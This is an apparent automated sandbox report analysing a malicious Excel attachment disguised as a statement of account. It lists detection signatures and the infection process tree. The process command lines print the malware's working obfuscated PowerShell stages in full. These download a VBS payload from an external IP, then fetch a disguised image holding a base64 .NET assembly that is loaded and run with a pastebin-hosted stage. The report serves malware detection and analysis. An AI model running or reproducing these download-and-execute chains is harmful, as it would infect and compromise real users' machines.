Edit tour

Windows Analysis Report
SOA USD67,353.35.xla.xlsx

Overview

General Information

Sample name:	SOA USD67,353.35.xla.xlsx
Analysis ID:	1574072
MD5:	2c85440bb7983bbcda4cfb9f2350f95f
SHA1:	ae1f72edfd479dcf08cb80ea8bea1bc5429c1dbc
SHA256:	ce3ef0f989fb870bb0258926e344421055dbe53067e06b5635ca7931b2fb0bc5
Tags:	xlaxlsxuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected obfuscated html page

Connects to a pastebin service (likely for C&C)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3584 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3916 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

cmd.exe (PID: 4040 cmdline: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 4064 cmdline: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3212 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3224 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5706.tmp" "c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3364 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 2668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2668	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2668	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1c568:$b2: ::FromBase64String( 0x20957:$b2: ::FromBase64String( 0x292ca:$b2: ::FromBase64String( 0x4128e:$b2: ::FromBase64String( 0x4196a:$b2: ::FromBase64String( 0x6879b:$b2: ::FromBase64String( 0x68e77:$b2: ::FromBase64String( 0x69aee:$b2: ::FromBase64String( 0x6b3ff:$b2: ::FromBase64String( 0x6bc0a:$b2: ::FromBase64String( 0x6c2ef:$b2: ::FromBase64String( 0x71f54:$b2: ::FromBase64String( 0xa2ef0:$b2: ::FromBase64String( 0xa34a8:$b2: ::FromBase64String( 0xb13ad:$b2: ::FromBase64String( 0xb1a89:$b2: ::FromBase64String( 0x1c547:$b3: ::UTF8.GetString( 0x20936:$b3: ::UTF8.GetString( 0x292a9:$b3: ::UTF8.GetString( 0x4126d:$b3: ::UTF8.GetString( 0x41949:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLk

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4064, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" , ProcessId: 3364, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEl

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

